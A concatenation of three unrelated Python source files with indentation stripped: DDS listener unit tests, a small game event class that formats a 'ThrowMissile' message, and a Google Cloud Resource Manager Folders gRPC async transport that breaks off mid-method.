dp = DomainParticipant(listener=DPL())
self.assertIsInstance(dp.listener, DPL, 'listener is not a DPL')
topic_name = 'ST_data_available_listeners'
gci = ddsutil.get_dds_classes_from_idl(self.idl_path, self.shape_type_name)
t = gci.register_topic(dp, topic_name)
pub = dp.create_publisher(listener=PL())
self.assertIsInstance(pub.listener, PL, 'listener is not a PL')
sub = dp.create_subscriber(listener=SL())
self.assertIsInstance(sub.listener, SL, 'listener is not a SL')
wr = pub.create_datawriter(t, listener=WL())
self.assertIsInstance(wr.listener, WL, 'listener is not a WL')
rd = sub.create_datareader(t, listener=RL())
self.assertIsInstance(rd.listener, RL, 'listener is not a RL')
ShapeType = gci.get_class('ShapeType')
Inner = gci.get_class('Inner')
data = ShapeType(color='GREEN', x=22, y=33, z=44, t=Inner(foo=55))
# time.sleep(1.0)
wr.write(data)
TriggerState = collections.namedtuple('TriggerState',[
'opm',
'osm',
'oda',
])
actual_trigger_state = TriggerState(
opm_event.wait(self.time_out),
osm_event.wait(self.time_out),
oda_event.wait(self.time_out))
print(actual_trigger_state)
self.assertEqual(
actual_trigger_state,
TriggerState(True, True, True)
, 'Not all events triggered')
EventState = collections.namedtuple('EventState',[
'dp_opm',
'p_opm',
'wr_opm',
'dp_osm',
's_osm',
'rd_osm',
'dp_oda',
's_oda',
'rd_oda',
])
actual_event_state = EventState(
dp_on_publication_matched_event.is_set(),
p_on_publication_matched_event.is_set(),
wr_on_publication_matched_event.is_set(),
dp_on_subscription_matched_event.is_set(),
s_on_subscription_matched_event.is_set(),
rd_on_subscription_matched_event.is_set(),
dp_on_data_available_event.is_set(),
s_on_data_available_event.is_set(),
rd_on_data_available_event.is_set(),
)
expected_event_state = EventState(
False, False, True,
False, False, True,
False, False, True,
)
print(actual_event_state)
self.assertEqual(actual_event_state, expected_event_state, 'Incorrect listeners triggered')
# time.sleep(1.0)
# self.assertTrue(wr_on_publication_matched_event.wait(self.time_out), 'wr_on_publication_matched_event')
# self.assertTrue(rd_on_subscription_matched_event.wait(self.time_out), 'rd_on_subscription_matched_event')
self._check_status(pub_match_status, PublicationMatchedStatus, [
Info('total_count', int),
Info('total_count_change', int),
Info('current_count', int),
Info('current_count_change', int),
Info('last_subscription_handle', int),
])
self._check_status(sub_match_status, SubscriptionMatchedStatus, [
Info('total_count', int),
Info('total_count_change', int),
Info('current_count', int),
Info('current_count_change', int),
Info('last_publication_handle', int),
])
def test_on_offered_deadline_missed(self):
handlerTriggered = threading.Event()
write_time = 0.0
delay = 0.0
saved_status = None
class L(Listener):
def on_offered_deadline_missed(self, writer, status):
nonlocal delay
nonlocal saved_status
handlerTriggered.set()
saved_status = status
delay = time.time() - write_time
dp = DomainParticipant()
topic_name = 'ST_on_offered_deadline_missed'
gci = ddsutil.get_dds_classes_from_idl(self.idl_path, self.shape_type_name)
t = gci.register_topic(dp, topic_name)
wqos = Qos(policies=[
DeadlineQosPolicy(DDSDuration(1,0))
])
wr = dp.create_datawriter(t, wqos, L())
rd = dp.create_datareader(t)
ShapeType = gci.get_class('ShapeType')
Inner = gci.get_class('Inner')
data = ShapeType(color='GREEN', x=22, y=33, z=44, t=Inner(foo=55))
wr.write(data)
write_time = time.time()
self.assertTrue(handlerTriggered.wait(self.time_out), 'Event not triggered')
self.assertGreaterEqual(delay, 1.0 - 0.05, 'Delay not >= 1.0s')
self._check_status(saved_status, OfferedDeadlineMissedStatus, [
Info('total_count', int),
Info('total_count_change', int),
Info('last_instance_handle', int),
])
def test_on_offered_incompatible_qos(self):
handlerTriggered = threading.Event()
saved_status = None
class L(Listener):
def on_offered_incompatible_qos(self, writer, status):
nonlocal saved_status
saved_status = status
handlerTriggered.set()
dp = DomainParticipant()
topic_name = 'ST_on_offered_incompatible_qos'
gci = ddsutil.get_dds_classes_from_idl(self.idl_path, self.shape_type_name)
t = gci.register_topic(dp, topic_name)
wqos = Qos(policies=[
DurabilityQosPolicy(DDSDurabilityKind.VOLATILE)
])
rqos = Qos(policies=[
DurabilityQosPolicy(DDSDurabilityKind.TRANSIENT)
])
wr = dp.create_datawriter(t, wqos, L())
rd = dp.create_datareader(t,rqos)
ShapeType = gci.get_class('ShapeType')
Inner = gci.get_class('Inner')
data = ShapeType(color='GREEN', x=22, y=33, z=44, t=Inner(foo=55))
wr.write(data)
self.assertTrue(handlerTriggered.wait(self.time_out), 'Event not triggered')
self._check_status(saved_status, OfferedIncompatibleQosStatus, [
Info('total_count', int),
Info('total_count_change', int),
Info('last_policy_id', QosPolicyId),
])
def test_liveliness(self):
handlerTriggered = threading.Event()
aliveTriggered = threading.Event()
notaliveTriggered = threading.Event()
write_time = 0.0
delay = 0.0
saved_lost_status = None
saved_changed_status = None
class L(Listener):
def on_liveliness_lost(self, writer, status):
nonlocal delay
nonlocal saved_lost_status
saved_lost_status = status
handlerTriggered.set()
delay = time.time() - write_time
class RL(Listener):
def on_liveliness_changed(self, reader, status):
nonlocal saved_changed_status
saved_changed_status = status
if status.alive_count == 1:
aliveTriggered.set()
else:
notaliveTriggered.set()
qos = Qos(policies=[
LivelinessQosPolicy(DDSLivelinessKind.MANUAL_BY_TOPIC,
DDSDuration(1,0)),
OwnershipQosPolicy(DDSOwnershipKind.EXCLUSIVE)
])
dp = DomainParticipant()
topic_name = 'ST_liveliness'
gci = ddsutil.get_dds_classes_from_idl(self.idl_path, self.shape_type_name)
t = gci.register_topic(dp, topic_name, qos)
wr = dp.create_datawriter(t, qos=qos, listener=L())
rd = dp.create_datareader(t, qos=qos, listener=RL())
ShapeType = gci.get_class('ShapeType')
Inner = gci.get_class('Inner')
data = ShapeType(color='GREEN', x=22, y=33, z=44, t=Inner(foo=55))
wr.write(data)
write_time = time.time()
self.assertTrue(handlerTriggered.wait(self.time_out), 'Event not triggered')
self.assertGreaterEqual(delay, 1.0 - 0.05, 'Delay not >= 1.0s')
self.assertTrue(aliveTriggered.wait(self.time_out), 'Alive not signaled to reader')
self.assertTrue(notaliveTriggered.wait(self.time_out), 'Not Alive not signaled to reader')
self._check_status(saved_lost_status, LivelinessLostStatus, [
Info('total_count', int),
Info('total_count_change', int),
])
self._check_status(saved_changed_status, LivelinessChangedStatus, [
Info('alive_count', int),
Info('not_alive_count', int),
Info('alive_count_change', int),
Info('not_alive_count_change', int),
Info('last_publication_handle', int),
])
def test_on_requested_deadline_missed(self):
handlerTriggered = threading.Event()
write_time = 0.0
delay = 0.0
saved_status = None
class L(Listener):
def on_requested_deadline_missed(self, reader, status):
nonlocal delay
nonlocal saved_status
saved_status = status
handlerTriggered.set()
delay = time.time() - write_time
dp = DomainParticipant()
topic_name = 'ST_on_requested_deadline_missed'
gci = ddsutil.get_dds_classes_from_idl(self.idl_path, self.shape_type_name)
t = gci.register_topic(dp, topic_name)
qos = Qos(policies=[
DeadlineQosPolicy(DDSDuration(1,0))
])
wr = dp.create_datawriter(t, qos)
rd = dp.create_datareader(t, qos, L())
ShapeType = gci.get_class('ShapeType')
Inner = gci.get_class('Inner')
data = ShapeType(color='GREEN', x=22, y=33, z=44, t=Inner(foo=55))
wr.write(data)
write_time = time.time()
self.assertTrue(handlerTriggered.wait(self.time_out), 'Event not triggered')
self.assertGreaterEqual(delay, 1.0 - 0.05, 'Delay not >= 1.0s')
self._check_status(saved_status, RequestedDeadlineMissedStatus, [
Info('total_count', int),
Info('total_count_change', int),
Info('last_instance_handle', int),
])
def test_on_requested_incompatible_qos(self):
handlerTriggered = threading.Event()
saved_status = None
class L(Listener):
def on_requested_incompatible_qos(self, reader, status):
nonlocal saved_status
saved_status = status
handlerTriggered.set()
dp = DomainParticipant()
topic_name = 'ST_test_on_requested_incompatible_qos'
gci = ddsutil.get_dds_classes_from_idl(self.idl_path, self.shape_type_name)
t = gci.register_topic(dp, topic_name)
wqos = Qos(policies=[
DurabilityQosPolicy(DDSDurabilityKind.VOLATILE)
])
rqos = Qos(policies=[
DurabilityQosPolicy(DDSDurabilityKind.TRANSIENT)
])
wr = dp.create_datawriter(t, wqos)
rd = dp.create_datareader(t,rqos, L())
ShapeType = gci.get_class('ShapeType')
Inner = gci.get_class('Inner')
data = ShapeType(color='GREEN', x=22, y=33, z=44, t=Inner(foo=55))
wr.write(data)
self.assertTrue(handlerTriggered.wait(self.time_out), 'Event not triggered')
self._check_status(saved_status, RequestedIncompatibleQosStatus, [
Info('total_count', int),
Info('total_count_change', int),
Info('last_policy_id', QosPolicyId),
])
def test_on_sample_rejected(self):
handlerTriggered = threading.Event()
saved_status = None
class L(Listener):
def on_sample_rejected(self, reader, status):
nonlocal saved_status
saved_status = status
handlerTriggered.set()
dp = DomainParticipant()
topic_name = 'ST_on_sample_rejected'
gci = ddsutil.get_dds_classes_from_idl(self.idl_path, self.shape_type_name)
t = gci.register_topic(dp, topic_name)
qos = Qos(policies=[
ResourceLimitsQosPolicy(max_samples=1)
])
wr = dp.create_datawriter(t)
rd = dp.create_datareader(t, qos, L())
ShapeType = gci.get_class('ShapeType')
Inner = gci.get_class('Inner')
data1 = ShapeType(color='GREEN', x=22, y=33, z=44, t=Inner(foo=55))
data2 = ShapeType(color='BLUE', x=222, y=233, z=244, t=Inner(foo=255))
wr.write(data1)
self.assertFalse(handlerTriggered.is_set(), 'Event already triggered')
wr.write(data2)
self.assertTrue(handlerTriggered.wait(self.time_out), 'Event not triggered')
self._check_status(saved_status, SampleRejectedStatus, [
Info('total_count', int),
Info('total_count_change', int),
Info('last_reason', DDSSampleRejectedStatusKind),
Info('last_instance_handle', int),
])
def test_on_sample_lost(self):
handlerTriggered = threading.Event()
saved_status = None
class L(Listener):
def on_sample_lost(self, reader, status):
nonlocal saved_status
saved_status = status
handlerTriggered.set()
qos = Qos(policies=[
DestinationOrderQosPolicy(DDSDestinationOrderKind.BY_SOURCE_TIMESTAMP)
])
dp = DomainParticipant()
topic_name = 'ST_on_sample_lost'
gci = ddsutil.get_dds_classes_from_idl(self.idl_path, self.shape_type_name)
t = gci.register_topic(dp, topic_name)
wr = dp.create_datawriter(t, qos)
rd = dp.create_datareader(t, qos, L())
ShapeType = gci.get_class('ShapeType')
Inner = gci.get_class('Inner')
data1 = ShapeType(color='GREEN', x=22, y=33, z=44, t=Inner(foo=55))
t1 = DDSTime(1000,0)
t2 = DDSTime(1001,0)
# write out-of-order samples
wr.write_ts(data1, t2)
rd.take()
wr.write_ts(data1, t1)
self.assertTrue(handlerTriggered.wait(self.time_out), 'Event not triggered')
self._check_status(saved_status, SampleLostStatus, [
Info('total_count', int),
Info('total_count_change', int),
])
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
|
'''
Created on Jan 2, 2015
@author: scarriere
'''
from event.OutgoingEvent import OutgoingEvent
from mathUtils.Direction import Direction
class ThrowMissileEvent(OutgoingEvent):
def __init__(self, characterId, direction):
self.characterId = characterId
self.direction = Direction(direction)
def toString(self):
message = "Game:ThrowMissile:"
message += str(self.characterId) + self.SEPARATOR
message += str(self.direction.value)
return message
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Awaitable, Callable, Dict, Optional, Sequence, Tuple, Union
from google.api_core import gapic_v1 # type: ignore
from google.api_core import grpc_helpers_async # type: ignore
from google.api_core import operations_v1 # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import packaging.version
import grpc # type: ignore
from grpc.experimental import aio # type: ignore
from google.cloud.resourcemanager_v3.types import folders
from google.iam.v1 import iam_policy_pb2 # type: ignore
from google.iam.v1 import policy_pb2 # type: ignore
from google.longrunning import operations_pb2 # type: ignore
from .base import FoldersTransport, DEFAULT_CLIENT_INFO
from .grpc import FoldersGrpcTransport
class FoldersGrpcAsyncIOTransport(FoldersTransport):
"""gRPC AsyncIO backend transport for Folders.
Manages Cloud Platform folder resources.
Folders can be used to organize the resources under an
organization and to control the policies applied to groups of
resources.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
_grpc_channel: aio.Channel
_stubs: Dict[str, Callable] = {}
@classmethod
def create_channel(
cls,
host: str = "cloudresourcemanager.googleapis.com",
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
**kwargs,
) -> aio.Channel:
"""Create and return a gRPC AsyncIO channel object.
Args:
host (Optional[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
aio.Channel: A gRPC AsyncIO channel object.
"""
return grpc_helpers_async.create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
quota_project_id=quota_project_id,
default_scopes=cls.AUTH_SCOPES,
scopes=scopes,
default_host=cls.DEFAULT_HOST,
**kwargs,
)
def __init__(
self,
*,
host: str = "cloudresourcemanager.googleapis.com",
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
channel: aio.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
client_cert_source_for_mtls: Callable[[], Tuple[bytes, bytes]] = None,
quota_project_id=None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
channel (Optional[aio.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
``client_cert_source`` or application default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for the grpc channel. It is ignored if ``channel`` is provided.
client_cert_source_for_mtls (Optional[Callable[[], Tuple[bytes, bytes]]]):
A callback to provide client certificate bytes and private key bytes,
both in PEM format. It is used to configure a mutual TLS channel. It is
ignored if ``channel`` or ``ssl_channel_credentials`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
Raises:
google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport
creation failed for any reason.
google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
and ``credentials_file`` are passed.
"""
self._grpc_channel = None
self._ssl_channel_credentials = ssl_channel_credentials
self._stubs: Dict[str, Callable] = {}
self._operations_client = None
if api_mtls_endpoint:
warnings.warn("api_mtls_endpoint is deprecated", DeprecationWarning)
if client_cert_source:
warnings.warn("client_cert_source is deprecated", DeprecationWarning)
if channel:
# Ignore credentials if a channel was passed.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
else:
if api_mtls_endpoint:
host = api_mtls_endpoint
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
self._ssl_channel_credentials = SslCredentials().ssl_credentials
else:
if client_cert_source_for_mtls and not ssl_channel_credentials:
cert, key = client_cert_source_for_mtls()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
# The base transport sets the host, credentials and scopes
super().__init__(
host=host,
credentials=credentials,
credentials_file=credentials_file,
scopes=scopes,
quota_project_id=quota_project_id,
client_info=client_info,
always_use_jwt_access=always_use_jwt_access,
)
if not self._grpc_channel:
self._grpc_channel = type(self).create_channel(
self._host,
credentials=self._credentials,
credentials_file=credentials_file,
scopes=self._scopes,
ssl_credentials=self._ssl_channel_credentials,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
# Wrap messages. This must be done after self._grpc_channel exists
self._prep_wrapped_messages(client_info)
@property
def grpc_channel(self) -> aio.Channel:
"""Create the channel designed to connect to this service.
This property caches on the instance; repeated calls return
the same channel.
"""
# Return the channel from cache.
return self._grpc_channel
@property
def operations_client(self) -> operations_v1.OperationsAsyncClient:
"""Create the client designed to process long-running operations.
This property caches on the instance; repeated calls return the same
client.
"""
# Sanity check: Only create a new client if we do not already have one.
if self._operations_client is None:
self._operations_client = operations_v1.OperationsAsyncClient(
self.grpc_channel
)
# Return the client from cache.
return self._operations_client
@property
def get_folder(
self,
) -> Callable[[folders.GetFolderRequest], Awaitable[folders.Folder]]:
r"""Return a callable for the get folder method over gRPC.
Retrieves a folder identified by the supplied resource name.
Valid folder resource names have the format
``folders/{folder_id}`` (for example, ``folders/1234``). The
caller must have ``resourcemanager.folders.get`` permission on
the identified folder.
Returns:
Callable[[~.GetFolderRequest],
Awaitable[~.Folder]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "get_folder" not in self._stubs:
self._stubs["get_folder"] = self.grpc_channel.unary_unary(
"/google.cloud.resourcemanager.v3.Folders/GetFolder",
request_serializer=folders.GetFolderRequest.serialize,
response_deserializer=folders.Folder.deserialize,
)
return self._stubs["get_folder"]
@property
def list_folders(
self,
) -> Callable[[folders.ListFoldersRequest], Awaitable[folders.ListFoldersResponse]]:
r"""Return a callable for the list folders method over gRPC.
Lists the folders that are direct descendants of supplied parent
resource. ``list()`` provides a strongly consistent view of the
folders underneath the specified parent resource. ``list()``
returns folders sorted based upon the (ascending) lexical
ordering of their display_name. The caller must have
``resourcemanager.folders.list`` permission on the identified
parent.
Returns:
Callable[[~.ListFoldersRequest],
Awaitable[~.ListFoldersResponse]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "list_folders" not in self._stubs:
self._stubs["list_folders"] = self.grpc_channel.unary_unary(
"/google.cloud.resourcemanager.v3.Folders/ListFolders",
request_serializer=folders.ListFoldersRequest.serialize,
response_deserializer=folders.ListFoldersResponse.deserialize,
)
return self._stubs["list_folders"]
@property
def search_folders(
self,
) -> Callable[
[folders.SearchFoldersRequest], Awaitable[folders.SearchFoldersResponse]
]:
r"""Return a callable for the search folders method over gRPC.
Search for folders that match specific filter criteria.
``search()`` provides an eventually consistent view of the
folders a user has access to which meet the specified filter
criteria.
This will only return folders on which the caller has the
permission ``resourcemanager.folders.get``.
Returns:
Callable[[~.SearchFoldersRequest],
Awaitable[~.SearchFoldersResponse]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "search_folders" not in self._stubs:
self._stubs["search_folders"] = self.grpc_channel.unary_unary(
"/google.cloud.resourcemanager.v3.Folders/SearchFolders",
request_serializer=folders.SearchFoldersRequest.serialize,
response_deserializer=folders.SearchFoldersResponse.deserialize,
)
return self._stubs["search_folders"]
@property
def create_folder(
self,
) -> Callable[[folders.CreateFolderRequest], Awaitable[operations_pb2.Operation]]:
r"""Return a callable for the create folder method over gRPC.
Creates a folder in the resource hierarchy. Returns an
``Operation`` which can be used to track the progress of the
folder creation workflow. Upon success, the
``Operation.response`` field will be populated with the created
Folder.
In order to succeed, the addition of this new folder must not
violate the folder naming, height, or fanout constraints.
- The folder's ``display_name`` must be distinct from all other
folders that share its parent.
- The addition of the folder must not cause the active folder
hierarchy to exceed a height of 10. Note, the full active +
deleted folder hierarchy is allowed to reach a height of 20;
this provides additional headroom when moving folders that
contain deleted folders.
- The addition of the folder must not cause the total number of
folders under its parent to exceed 300.
If the operation fails due to a folder constraint violation,
some errors may be returned by the ``CreateFolder`` request,
with status code ``FAILED_PRECONDITION`` and an error
description. Other folder constraint violations will be
communicated in the ``Operation``, with the specific
``PreconditionFailure`` returned in the details list in the
``Operation.error`` field.
The caller must have ``resourcemanager.folders.create``
permission on the identified parent.
Returns:
Callable[[~.CreateFolderRequest],
Awaitable[~.Operation]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "create_folder" not in self._stubs:
self._stubs["create_folder"] = self.grpc_channel.unary_unary(
"/google.cloud.resourcemanager.v3.Folders/CreateFolder",
request_serializer=folders.CreateFolderRequest.serialize,
response_deserializer=operations_pb2.Operation.FromString,
)
return self._stubs["create_folder"]
@property
def update_folder(
self,
) -> Callable[[folders.UpdateFolderRequest], Awaitable[operations_pb2.Operation]]:
r"""Return a callable for the update folder method over gRPC.
Updates a folder, changing its ``display_name``. Changes to the
folder ``display_name`` will be rejected if they violate either
the ``display_name`` formatting rules or the naming constraints
described in the
[CreateFolder][google.cloud.resourcemanager.v3.Folders.CreateFolder]
documentation.
The folder's ``display_name`` must start and end with a letter
or digit, may contain letters, digits, spaces, hyphens and
underscores and can be between 3 and 30 characters. This is
captured by the regular expression:
``[\p{L}\p{N}][\p{L}\p{N}_- ]{1,28}[\p{L}\p{N}]``. The caller
must have ``resourcemanager.folders.update`` permission on the
identified folder.
If the update fails due to the unique name constraint then a
``PreconditionFailure`` explaining this violation will be
returned in the Status.details field.
Returns:
Callable[[~.UpdateFolderRequest],
Awaitable[~.Operation]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "update_folder" not in self._stubs:
self._stubs["update_folder"] = self.grpc_channel.unary_unary(
"/google.cloud.resourcemanager.v3.Folders/UpdateFolder",
request_serializer=folders.UpdateFolderRequest.serialize,
response_deserializer=operations_pb2.Operation.FromString,
)
return self._stubs["update_folder"]
@property
def move_folder(
self,
) -> Callable[[folders.MoveFolderRequest], Awaitable[operations_pb2.Operation]]:
r"""Return a callable for the move folder method over gRPC.
Moves a folder under a new resource parent. Returns an
``Operation`` which can be used to track the progress of the
folder move workflow. Upon success, the ``Operation.response``
field will be populated with the moved folder. Upon failure, a
``FolderOperationError`` categorizing the failure cause will be
returned - if the failure occurs synchronously then the
``FolderOperationError`` will be returned in the
``Status.details`` field. If it occurs asynchronously, then the
FolderOperation will be returned in the ``Operation.error``
field. In addition, the ``Operation.metadata`` field will be
populated with a ``FolderOperation`` message as an aid to
stateless clients. Folder moves will be rejected if they violate
either the naming, height, or fanout constraints described in
the
[CreateFolder][google.cloud.resourcemanager.v3.Folders.CreateFolder]
documentation. The caller must have
``resourcemanager.folders.move`` permission on the folder's
current and proposed new parent.
Returns:
Callable[[~.MoveFolderRequest],
Awaitable[~.Operation]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "move_folder" not in self._stubs:
self._stubs["move_folder"] = self.grpc_channel.unary_unary(
"/google.cloud.resourcemanager.v3.Folders/MoveFolder",
request_serializer=folders.MoveFolderRequest.serialize,
response_deserializer=operations_pb2.Operation.FromString,
)
return self._stubs["move_folder"]
@property
def delete_folder(
self,
) -> Callable[[folders.DeleteFolderRequest], Awaitable[operations_pb2.Operation]]:
r"""Return a callable for the delete folder method over gRPC.
Requests deletion of a folder. The folder is moved into the
[DELETE_REQUESTED][google.cloud.resourcemanager.v3.Folder.State.DELETE_REQUESTED]
state immediately, and is deleted approximately 30 days later.
This method may only be called on an empty folder, where a
folder is empty if it doesn't contain any folders or projects in
the
[ACTIVE][google.cloud.resourcemanager.v3.Folder.State.ACTIVE]
state. If called on a folder in
[DELETE_REQUESTED][google.cloud.resourcemanager.v3.Folder.State.DELETE_REQUESTED]
state the operation will result in a no-op success. The caller
must have ``resourcemanager.folders.delete`` permission on the
identified folder.
Returns:
Callable[[~.DeleteFolderRequest],
Awaitable[~.Operation]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "delete_folder" not in self._stubs:
self._stubs["delete_folder"] = self.grpc_channel.unary_unary(
"/google.cloud.resourcemanager.v3.Folders/DeleteFolder",
request_serializer=folders.DeleteFolderRequest.serialize,
response_deserializer=operations_pb2.Operation.FromString,
)
return self._stubs["delete_folder"]
@property
def undelete_folder(
self,
) -> Callable[[folders.UndeleteFolderRequest], Awaitable[operations_pb2.Operation]]:
r"""Return a callable for the undelete folder method over gRPC.
Cancels the deletion request for a folder. This method may be
called on a folder in any state. If the folder is in the
[ACTIVE][google.cloud.resourcemanager.v3.Folder.State.ACTIVE]
state the result will be a no-op success. In order to succeed,
the folder's parent must be in the
[ACTIVE][google.cloud.resourcemanager.v3.Folder.State.ACTIVE]
state. In addition, reintroducing the folder into the tree must
not violate folder naming, height, and fanout constraints
described in the
[CreateFolder][google.cloud.resourcemanager.v3.Folders.CreateFolder]
documentation. The caller must have
``resourcemanager.folders.undelete`` permission on the
identified folder.
Returns:
Callable[[~.UndeleteFolderRequest],
Awaitable[~.Operation]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "undelete_folder" not in self._stubs:
self._stubs["undelete_folder"] = self.grpc_channel.unary_unary(
"/google.cloud.resourcemanager.v3.Folders/UndeleteFolder",
request_serializer=folders.UndeleteFolderRequest.serialize,
response_deserializer=operations_pb2.Operation.FromString,
)
return self._stubs["undelete_folder"]
@property
def get_iam_policy(
self,
) -> Callable[[iam_policy_pb2.GetIamPolicyRequest], Awaitable[policy_pb2.Policy]]:
r"""Return a callable for the get iam policy method over gRPC.
Gets the access control policy for a folder. The returned policy
may be empty if no such policy or resource exists. The
``resource`` field should be the folder's resource name, for
example: "folders/1234". The caller must have
``resourcemanager.folders.getIamPolicy`` permission on the
identified folder.
Returns:
Callable[[~.GetIamPolicyRequest],
Awaitable[~.Policy]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "get_iam_policy" not in self._stubs:
self._stubs["get_iam_policy"] = self.grpc_channel.unary_unary(
"/google.cloud.resourcemanager.v3.Folders/GetIamPolicy",
request_serializer=iam_policy_pb2.GetIamPolicyRequest.SerializeToString,
response_deserializer=policy_pb2.Policy.FromString,
)
return self._stubs["get_iam_policy"]
@property
def set_iam_policy(
self,
) -> Callable[[iam_policy_pb2.SetIamPolicyRequest], Awaitable[policy_pb2.Policy]]:
r"""Return a callable for the set iam policy method over gRPC.
Sets the access control policy on a folder, replacing any
existing policy. The ``resource`` field should be the folder's
resource name, for example: "folders/1234". The caller must have
``resourcemanager.folders.setIamPolicy`` permission on the
identified folder.
Returns:
Callable[[~.SetIamPolicyRequest],
Awaitable[~.Policy]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "set_iam_policy" not in self._stubs:
self._stubs["set_iam_policy"] = self.grpc_channel.unary_unary(
"/google.cloud.resourcemanager.v3.Folders/SetIamPolicy",
request_serializer=iam_policy_pb2.SetIamPolicyRequest.SerializeToString,
response_deserializer=policy_pb2.Policy.FromString,
)
return self._stubs["set_iam_policy"]
@property
def test_iam_permissions(
self,
) -> Callable[
[iam_policy_pb2.TestIamPermissionsRequest],
Awaitable[iam_policy_pb2.TestIamPermissionsResponse],
]:
r"""Return a callable for the test iam permissions method over gRPC.
Returns permissions that a caller has on the specified folder.
The ``resource`` field should be the folder's resource name, for
example: "folders/1234".
There are no permissions required for making this API call.
Returns:
Callable[[~.TestIamPermissionsRequest],
Awaitable[~.TestIamPermissionsResponse]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "test_iam_permissions" not in self._stubs:
